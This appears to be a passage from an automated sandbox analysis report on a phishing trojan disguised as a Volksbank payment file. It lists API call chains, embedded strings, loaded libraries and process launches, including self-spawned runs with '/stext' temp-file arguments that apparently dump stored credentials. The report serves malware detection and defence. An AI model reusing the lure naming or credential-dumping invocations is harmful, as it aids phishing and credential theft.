            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004017B7 NtdllDefWindowProc_A,3_2_004017B7
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403350
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F4B5C11_2_34F4B5C1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00406E8F2_2_00406E8F
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044B0402_2_0044B040
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0043610D2_2_0043610D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004473102_2_00447310
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044A4902_2_0044A490
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040755A2_2_0040755A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0043C5602_2_0043C560
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044B6102_2_0044B610
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044D6C02_2_0044D6C0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004476F02_2_004476F0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044B8702_2_0044B870
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044081D2_2_0044081D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004149572_2_00414957
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004079EE2_2_004079EE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00407AEB2_2_00407AEB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044AA802_2_0044AA80
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00412AA92_2_00412AA9
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00404B742_2_00404B74
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00404B032_2_00404B03
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0044BBD82_2_0044BBD8
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00404BE52_2_00404BE5
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00404C762_2_00404C76
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00415CFE2_2_00415CFE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00416D722_2_00416D72
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00446D302_2_00446D30
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00446D8B2_2_00446D8B
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004050383_2_00405038
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0041208C3_2_0041208C
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004050A93_2_004050A9
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0040511A3_2_0040511A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0043C13A3_2_0043C13A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004051AB3_2_004051AB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004493003_2_00449300
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0040D3223_2_0040D322
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0044A4F03_2_0044A4F0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0043A5AB3_2_0043A5AB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004136313_2_00413631
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004466903_2_00446690
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0044A7303_2_0044A730
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004398D83_2_004398D8
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004498E03_2_004498E0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0044A8863_2_0044A886
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0043DA093_2_0043DA09
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00438D5E3_2_00438D5E
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00449ED03_2_00449ED0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_0041FE833_2_0041FE83
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00430F543_2_00430F54
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 00416760 appears 69 times
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000000.00000000.2716525355.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3017439948.00000000041D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000000.2848426380.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F2B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3016057655.00000000041C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.2977734651.0000000004196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeBinary or memory string: OriginalFileName vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000000.2978160814.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000003.00000000.2978673638.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000000.2979186755.00000000007E3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeBinary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,2_2_004182CE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403350
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,2_2_00418758
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,2_2_00413D4C
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,2_2_0040B58D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile created: C:\Users\user\classroomsJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0V7E34
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile created: C:\Users\user\AppData\Local\Temp\nss8DEC.tmpJump to behavior
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeFile read: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_3-33180
            Source: unknownProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeSection loaded: fwpuclnt.dllJump to behavior
